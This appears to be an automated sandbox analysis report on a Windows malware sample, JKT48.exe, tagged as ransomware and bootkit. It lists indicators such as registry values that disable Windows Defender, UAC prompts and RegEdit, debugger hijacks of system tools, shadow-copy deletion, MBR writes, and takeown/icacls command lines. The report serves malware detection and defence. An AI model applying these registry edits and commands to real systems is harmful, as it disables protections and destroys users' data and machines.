9b495506295d895825ddf2a45c28f704debc31f28c4943b1a78b75c898a4375d

Resubmissions

28/03/2025, 14:59

250328-sc4wsazjx2 10

28/03/2025, 14:53

250328-r9rr2sxwbz 10

27/03/2025, 13:35

250327-qvr9laswew 10

Analysis

max time kernel
23s
max time network
32s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
28/03/2025, 14:53

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

JKT48.exe
Size

8.0MB
MD5

41f5bac802f5e79dc2ca7a3db25d0001
SHA1

ce56c42cadd2db13edf03c15ce3b11c2cfa00f9e
SHA256

9b495506295d895825ddf2a45c28f704debc31f28c4943b1a78b75c898a4375d
SHA512

94705e83ce1b104954be07210ea3648c7403a6dd86ebaf6e884ced1552636b6a05a3b2926415d6c49ff251a675815435e4b2a3c8f816bbbf68c08c3299db99ab
SSDEEP

196608:PF35AX/ip4e/aS3e+gr80KILDjhoOX9oeqZ8r8swzH0e:d3KX/o4eSTr80xHhJ8s63

Score

10^/10

bootkit defense_evasion discovery evasion execution exploit impact persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	JKT48.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	JKT48.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Disables RegEdit via registry modification 1 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	JKT48.exe

Disables Task Manager via registry modification
defense_evasion
Disables use of System Restore points 1 TTPs
defense_evasion

Inhibit System Recovery
T1490

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 32 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipconfig.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LogonUI.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LogonUI.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipconfig.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trustedinstaller.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trustedinstaller.exe\Debugger = "*/"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe	JKT48.exe

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
3508	takeown.exe
1408	takeown.exe
2472	takeown.exe
3736	takeown.exe
336	takeown.exe
3700	icacls.exe
4880	icacls.exe
2572	icacls.exe
2964	icacls.exe
3896	icacls.exe
1524	icacls.exe
1068	icacls.exe
5420	icacls.exe
632	takeown.exe
2204	icacls.exe
4860	takeown.exe
916	takeown.exe
5976	takeown.exe
5336	takeown.exe
5420	takeown.exe
3164	takeown.exe
5164	takeown.exe
4544	icacls.exe
3548	icacls.exe
884	takeown.exe
6092	icacls.exe
5752	takeown.exe
4516	takeown.exe
2512	icacls.exe
4996	icacls.exe
5568	icacls.exe
3704	takeown.exe
5564	icacls.exe
3312	icacls.exe
1608	icacls.exe
1016	takeown.exe
5296	icacls.exe
3608	takeown.exe
288	takeown.exe
1728	takeown.exe
5168	icacls.exe
6052	takeown.exe
5740	takeown.exe
6128	icacls.exe
3208	takeown.exe
1460	takeown.exe
4848	icacls.exe
1504	icacls.exe
1716	takeown.exe
2264	takeown.exe
4908	takeown.exe
4468	takeown.exe
2696	icacls.exe
4988	icacls.exe
2132	takeown.exe
5084	icacls.exe
8	icacls.exe
1684	takeown.exe
4928	takeown.exe
4848	icacls.exe
4900	icacls.exe
6128	icacls.exe
4392	icacls.exe
1124	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	JKT48.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
760	takeown.exe
3800	takeown.exe
2920	takeown.exe
4392	icacls.exe
2868	takeown.exe
1680	icacls.exe
4216	takeown.exe
4864	icacls.exe
2584	icacls.exe
5236	takeown.exe
5116	takeown.exe
4516	takeown.exe
1844	icacls.exe
3476	icacls.exe
5212	icacls.exe
4656	icacls.exe
2168	takeown.exe
5900	takeown.exe
4904	icacls.exe
4644	takeown.exe
2616	icacls.exe
2668	icacls.exe
5176	icacls.exe
6060	icacls.exe
4008	icacls.exe
4884	takeown.exe
4416	takeown.exe
6128	icacls.exe
6120	takeown.exe
5336	icacls.exe
6128	icacls.exe
4720	takeown.exe
5564	icacls.exe
452	icacls.exe
5220	icacls.exe
5604	icacls.exe
5884	icacls.exe
5564	icacls.exe
3644	icacls.exe
1720	icacls.exe
5856	icacls.exe
3464	takeown.exe
3984	icacls.exe
3452	icacls.exe
5684	icacls.exe
2556	takeown.exe
5004	icacls.exe
3640	icacls.exe
1424	icacls.exe
1948	takeown.exe
2036	takeown.exe
4752	icacls.exe
416	icacls.exe
4424	takeown.exe
1728	icacls.exe
2696	takeown.exe
4088	takeown.exe
4784	takeown.exe
1068	takeown.exe
868	icacls.exe
4104	icacls.exe
5084	icacls.exe
3216	takeown.exe
3972	takeown.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	JKT48.exe

Drops file in System32 directory 29 IoCs

description	ioc	Process
File created	C:\windows\system32\taskkill.exe	JKT48.exe
File created	C:\windows\system32\sfc.exe	JKT48.exe
File created	C:\windows\syswow64\sfc.exe	JKT48.exe
File created	C:\windows\system32\msconfig.exe	JKT48.exe
File created	C:\windows\system32\sethc.exe	JKT48.exe
File created	C:\windows\system32\perfmon.exe	JKT48.exe
File created	C:\windows\system32\resmon.exe	JKT48.exe
File created	C:\windows\system32\logonui.exe	JKT48.exe
File created	C:\windows\system32\rundll32.exe	JKT48.exe
File created	C:\windows\system32\ntoskrnl.exe	JKT48.exe
File created	C:\windows\syswow64\reg.exe	JKT48.exe
File created	C:\windows\syswow64\perfmon.exe	JKT48.exe
File created	C:\windows\system32\hal.dll	JKT48.exe
File created	C:\windows\syswow64\regedit.exe	JKT48.exe
File created	C:\windows\system32\perfmon.msc	JKT48.exe
File created	C:\windows\syswow64\taskkill.exe	JKT48.exe
File created	C:\windows\syswow64\perfmon.msc	JKT48.exe
File created	C:\windows\syswow64\resmon.exe	JKT48.exe
File created	C:\windows\syswow64\utilman.exe	JKT48.exe
File created	C:\windows\syswow64\rundll32.exe	JKT48.exe
File created	C:\windows\syswow64\sethc.exe	JKT48.exe
File created	C:\windows\system32\cmd.exe	JKT48.exe
File created	C:\windows\system32\reg.exe	JKT48.exe
File created	C:\windows\system32\taskmgr.exe	JKT48.exe
File created	C:\windows\system32\utilman.exe	JKT48.exe
File created	C:\windows\system32\rstrui.exe	JKT48.exe
File created	C:\windows\syswow64\cmd.exe	JKT48.exe
File created	C:\windows\system32\winload.exe	JKT48.exe
File created	C:\windows\syswow64\taskmgr.exe	JKT48.exe

Drops file in Program Files directory 34 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\RCXC321.tmp	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\RCXC815.tmp	JKT48.exe
File created	C:\Program Files\dotnet\996573214	JKT48.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\dotnet\RCXE1E9.tmp	JKT48.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\7-Zip\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\MSInfo\666855190	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\Source Engine\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\dotnet\996573214	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\OFFICE16\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\RCXC816.tmp	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\Source Engine\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\VSTO\10.0\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\dotnet\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\666855190	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\537882728	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VSTO\10.0\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\dotnet\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\OFFICE16\537882728	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\MSInfo\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\dotnet\RCXE1E8.tmp	JKT48.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\RCXC322.tmp	JKT48.exe
File created	C:\Program Files\7-Zip\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\msvcp120ex.dll	JKT48.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\windows\servicing\trustedinstaller.exe	JKT48.exe
File created	C:\windows\regedit.exe	JKT48.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
5912	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe
4556	JKT48.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4556	JKT48.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4556	JKT48.exe
Token: SeDebugPrivilege	4556	JKT48.exe
Token: SeIncBasePriorityPrivilege	4556	JKT48.exe
Token: SeTakeOwnershipPrivilege	2016	takeown.exe
Token: SeTakeOwnershipPrivilege	5036	takeown.exe
Token: SeTakeOwnershipPrivilege	3208	takeown.exe
Token: SeTakeOwnershipPrivilege	4516	takeown.exe
Token: SeTakeOwnershipPrivilege	3760	takeown.exe
Token: SeTakeOwnershipPrivilege	3424	takeown.exe
Token: SeTakeOwnershipPrivilege	6052	takeown.exe
Token: SeTakeOwnershipPrivilege	4160	takeown.exe
Token: SeTakeOwnershipPrivilege	4884	takeown.exe
Token: SeTakeOwnershipPrivilege	3824	takeown.exe
Token: SeTakeOwnershipPrivilege	5336	takeown.exe
Token: SeTakeOwnershipPrivilege	5656	takeown.exe
Token: SeTakeOwnershipPrivilege	1716	takeown.exe
Token: SeTakeOwnershipPrivilege	4000	takeown.exe
Token: SeTakeOwnershipPrivilege	4644	takeown.exe
Token: SeTakeOwnershipPrivilege	5364	takeown.exe
Token: SeTakeOwnershipPrivilege	4828	takeown.exe
Token: SeTakeOwnershipPrivilege	5000	takeown.exe
Token: SeTakeOwnershipPrivilege	536	takeown.exe
Token: SeTakeOwnershipPrivilege	632	takeown.exe
Token: SeTakeOwnershipPrivilege	4476	takeown.exe
Token: SeTakeOwnershipPrivilege	1832	takeown.exe
Token: SeTakeOwnershipPrivilege	3688	takeown.exe
Token: SeTakeOwnershipPrivilege	2448	takeown.exe
Token: SeTakeOwnershipPrivilege	2868	takeown.exe
Token: SeTakeOwnershipPrivilege	5256	takeown.exe
Token: SeTakeOwnershipPrivilege	4988	takeown.exe
Token: SeTakeOwnershipPrivilege	5104	takeown.exe
Token: SeTakeOwnershipPrivilege	5460	takeown.exe
Token: SeTakeOwnershipPrivilege	2920	takeown.exe
Token: SeTakeOwnershipPrivilege	3632	takeown.exe
Token: SeTakeOwnershipPrivilege	3464	takeown.exe
Token: SeTakeOwnershipPrivilege	1868	takeown.exe
Token: SeTakeOwnershipPrivilege	3268	takeown.exe
Token: SeTakeOwnershipPrivilege	2956	takeown.exe
Token: SeTakeOwnershipPrivilege	5604	takeown.exe
Token: SeTakeOwnershipPrivilege	3264	takeown.exe
Token: SeTakeOwnershipPrivilege	5328	takeown.exe
Token: SeTakeOwnershipPrivilege	1736	takeown.exe
Token: SeTakeOwnershipPrivilege	5316	takeown.exe
Token: SeTakeOwnershipPrivilege	2516	takeown.exe
Token: SeTakeOwnershipPrivilege	2824	takeown.exe
Token: SeTakeOwnershipPrivilege	4812	takeown.exe
Token: SeTakeOwnershipPrivilege	3016	takeown.exe
Token: SeTakeOwnershipPrivilege	4204	takeown.exe
Token: SeTakeOwnershipPrivilege	1308	takeown.exe
Token: SeTakeOwnershipPrivilege	5628	takeown.exe
Token: SeTakeOwnershipPrivilege	1948	takeown.exe
Token: SeTakeOwnershipPrivilege	2712	takeown.exe
Token: SeTakeOwnershipPrivilege	3608	takeown.exe
Token: SeTakeOwnershipPrivilege	6128	takeown.exe
Token: SeTakeOwnershipPrivilege	700	takeown.exe
Token: SeTakeOwnershipPrivilege	1748	takeown.exe
Token: SeTakeOwnershipPrivilege	5448	takeown.exe
Token: SeTakeOwnershipPrivilege	2036	takeown.exe
Token: SeTakeOwnershipPrivilege	5408	takeown.exe
Token: SeTakeOwnershipPrivilege	2472	takeown.exe
Token: SeTakeOwnershipPrivilege	2144	takeown.exe
Token: SeTakeOwnershipPrivilege	5680	takeown.exe
Token: SeTakeOwnershipPrivilege	5892	takeown.exe
Token: SeTakeOwnershipPrivilege	5420	takeown.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4556	JKT48.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4556 wrote to memory of 3260	4556	JKT48.exe	88
PID 4556 wrote to memory of 3260	4556	JKT48.exe	88
PID 4556 wrote to memory of 2420	4556	JKT48.exe	90
PID 4556 wrote to memory of 2420	4556	JKT48.exe	90
PID 4556 wrote to memory of 3476	4556	JKT48.exe	92
PID 4556 wrote to memory of 3476	4556	JKT48.exe	92
PID 4556 wrote to memory of 2680	4556	JKT48.exe	94
PID 4556 wrote to memory of 2680	4556	JKT48.exe	94
PID 4556 wrote to memory of 1068	4556	JKT48.exe	96
PID 4556 wrote to memory of 1068	4556	JKT48.exe	96
PID 4556 wrote to memory of 4392	4556	JKT48.exe	98
PID 4556 wrote to memory of 4392	4556	JKT48.exe	98
PID 4556 wrote to memory of 4476	4556	JKT48.exe	100
PID 4556 wrote to memory of 4476	4556	JKT48.exe	100
PID 4556 wrote to memory of 4796	4556	JKT48.exe	102
PID 4556 wrote to memory of 4796	4556	JKT48.exe	102
PID 4556 wrote to memory of 4356	4556	JKT48.exe	104
PID 4556 wrote to memory of 4356	4556	JKT48.exe	104
PID 4556 wrote to memory of 2016	4556	JKT48.exe	106
PID 4556 wrote to memory of 2016	4556	JKT48.exe	106
PID 4556 wrote to memory of 6092	4556	JKT48.exe	108
PID 4556 wrote to memory of 6092	4556	JKT48.exe	108
PID 4556 wrote to memory of 4768	4556	JKT48.exe	110
PID 4556 wrote to memory of 4768	4556	JKT48.exe	110
PID 4556 wrote to memory of 4728	4556	JKT48.exe	112
PID 4556 wrote to memory of 4728	4556	JKT48.exe	112
PID 4556 wrote to memory of 5568	4556	JKT48.exe	114
PID 4556 wrote to memory of 5568	4556	JKT48.exe	114
PID 4556 wrote to memory of 5036	4556	JKT48.exe	116
PID 4556 wrote to memory of 5036	4556	JKT48.exe	116
PID 4556 wrote to memory of 3164	4556	JKT48.exe	118
PID 4556 wrote to memory of 3164	4556	JKT48.exe	118
PID 4556 wrote to memory of 3208	4556	JKT48.exe	120
PID 4556 wrote to memory of 3208	4556	JKT48.exe	120
PID 4556 wrote to memory of 4700	4556	JKT48.exe	122
PID 4556 wrote to memory of 4700	4556	JKT48.exe	122
PID 4556 wrote to memory of 4516	4556	JKT48.exe	124
PID 4556 wrote to memory of 4516	4556	JKT48.exe	124
PID 4556 wrote to memory of 884	4556	JKT48.exe	126
PID 4556 wrote to memory of 884	4556	JKT48.exe	126
PID 4556 wrote to memory of 3760	4556	JKT48.exe	128
PID 4556 wrote to memory of 3760	4556	JKT48.exe	128
PID 4556 wrote to memory of 868	4556	JKT48.exe	130
PID 4556 wrote to memory of 868	4556	JKT48.exe	130
PID 4556 wrote to memory of 3640	4556	JKT48.exe	132
PID 4556 wrote to memory of 3640	4556	JKT48.exe	132
PID 4556 wrote to memory of 2308	4556	JKT48.exe	134
PID 4556 wrote to memory of 2308	4556	JKT48.exe	134
PID 4556 wrote to memory of 3508	4556	JKT48.exe	136
PID 4556 wrote to memory of 3508	4556	JKT48.exe	136
PID 4556 wrote to memory of 5856	4556	JKT48.exe	138
PID 4556 wrote to memory of 5856	4556	JKT48.exe	138
PID 4556 wrote to memory of 3424	4556	JKT48.exe	140
PID 4556 wrote to memory of 3424	4556	JKT48.exe	140
PID 4556 wrote to memory of 5752	4556	JKT48.exe	142
PID 4556 wrote to memory of 5752	4556	JKT48.exe	142
PID 4556 wrote to memory of 5796	4556	JKT48.exe	144
PID 4556 wrote to memory of 5796	4556	JKT48.exe	144
PID 4556 wrote to memory of 5168	4556	JKT48.exe	146
PID 4556 wrote to memory of 5168	4556	JKT48.exe	146
PID 4556 wrote to memory of 6052	4556	JKT48.exe	148
PID 4556 wrote to memory of 6052	4556	JKT48.exe	148
PID 4556 wrote to memory of 1124	4556	JKT48.exe	150
PID 4556 wrote to memory of 1124	4556	JKT48.exe	150

System policy modification 1 TTPs 1 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	JKT48.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\JKT48.exe
"C:\Users\Admin\AppData\Local\Temp\JKT48.exe"
1⤵
- Modifies Windows Defender DisableAntiSpyware settings
- UAC bypass
- Disables RegEdit via registry modification
- Event Triggered Execution: Image File Execution Options Injection
- Checks computer location settings
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4556
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\$Recycle.Bin" /a
  2⤵
  PID:3260
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\$Recycle.Bin" /grant Administrators:F
  2⤵
  PID:2420
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\$Recycle.Bin\S-1-5-21-308834014-1004923324-1191300197-1000" /a
  2⤵
  PID:3476
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\$Recycle.Bin\S-1-5-21-308834014-1004923324-1191300197-1000" /grant Administrators:F
  2⤵
  PID:2680
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\7e20f84d5244aba7145631d4073af8" /a
  2⤵
  - Modifies file permissions
  PID:1068
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\7e20f84d5244aba7145631d4073af8" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4392
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\d25f591a00514bc9ba8441" /a
  2⤵
  PID:4476
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\d25f591a00514bc9ba8441" /grant Administrators:F
  2⤵
  PID:4796
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Documents and Settings" /a
  2⤵
  PID:4356
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\cmd.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2016
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Documents and Settings" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:6092
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\cmd.exe" /grant Administrators:F
  2⤵
  PID:4768
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\PerfLogs" /a
  2⤵
  PID:4728
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\PerfLogs" /grant Administrators:F
  2⤵
  PID:5568
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5036
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files" /grant Administrators:F
  2⤵
  PID:3164
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\regedit.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3208
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\regedit.exe" /grant Administrators:F
  2⤵
  PID:4700
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\reg.exe" /a
  2⤵
  - Modifies file permissions
